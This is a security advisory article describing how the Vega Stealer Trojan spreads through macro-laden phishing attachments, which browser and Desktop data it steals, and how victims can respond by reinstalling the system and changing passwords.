Companies that offer advertising and marketing services and that work in retail and manufacturing industries must be cautious about Vega Stealer. The threat is specifically targeted at bigger companies that offer customer support, and whose contact emails are available publically. Based on the email address that is obtained, cyber criminals can create fictitious messages that allegedly address issues. If the recipient of such an email is tricked into believing that the message is real, they are likely to be tricked into opening an attachment file (Word Document) that is actually corrupted. Once clicked, a message urging to enable content or macros is shown, and if it is enabled, PowerShell is executed silently, and malware payload is placed on the computer. From here, the information-stealing Trojan can successfully perform its malicious tasks, and the victim is unlikely to be warned that they need to delete Vega Stealer because of the obfuscation methods that are employed. That being said, removing this malware might not be possible.
Are you familiar with an infection called August Stealer? It is one variant of an infection that is publically available on the dark web. Any cyber criminal can purchase the code and build upon it to create a unique infection. The malicious August Stealer is well-documented because of its scope. Once executed on the system, it could steal passwords, usernames, login credentials, crypto-currency wallets, remote desktop connection file data, web cookies, and any and every file stored on the infected computer. The devious Vega Stealer is a much tamer variant, as it only targets data associated with Mozilla Firefox and Google Chrome web browsers. Also, while it can steal files, it only steals specific files that are located on the Desktop. It appears that the infection targets files with .doc, .docx, .pdf, .rtf, .txt, .xls, and .xlsx extensions. So, if you want to keep private files safe, one of the things you can do is keep them off Desktop. That, of course, does not mean that you can postpone the removal of Vega Stealer. Even if no personal files are stored on the computer, if you do not delete this malware fast, it will record data stored in the browser.
You now know that files on the Desktop are at risk, but there is so much more that’s at stake. For one, HTTP cookies could be stolen and transferred to a remote command and control (C&C) server for further analysis. The data stored in cookies range from geographical location, browse-related information, and browsing history to more sensitive data, such as login credentials. The infection is also capable of extracting the victim’s full name if profiles are set up on the browser, as well as credit card information that might be saved via autofill. If the victim’s full name is known, credit card number and expiration dates could help malicious parties commit fraud. Passwords can also be stolen from key3.db, key4.db, logins.json, and cookies.sqlite files that are stored in the Mozilla Firefox profile folder. If that was not enough, Vega Stealer was found to capture a screenshot of the Desktop (“screenshot.png”) to provide the attacker with even more information. Needless to say, if the target deletes Vega Stealer in time, they can evade a huge disaster.
Files with unfamiliar names can be placed onto the computer by Vega Stealer, but the infection itself runs as code, and so if the victim is not experienced or tech-savvy, even discovering it might be a serious feat. If a malware scanner detects this malware – which might not happen since the threat can use obfuscation techniques to evade discovery and removal – no time should be wasted because the longer one waits, the more information is likely to be stolen. That being said, since this malware is not after a lot of information, the theft is likely to be completed in no time. So, how can you remove Vega Stealer from the operating system? Most likely, you cannot do it yourself. Even anti-malware software might be unable to help. The quickest and most reliable way to ensure that the system is malware-free is to reinstall it. Unfortunately, that does not mean that cyber criminals can be stopped from exploiting the data that is already stolen. Passwords must be changed immediately, and close attention must be paid to all accounts. If customers’ data is stolen too, appropriate measures must be taken to alert them and help them with their virtual security.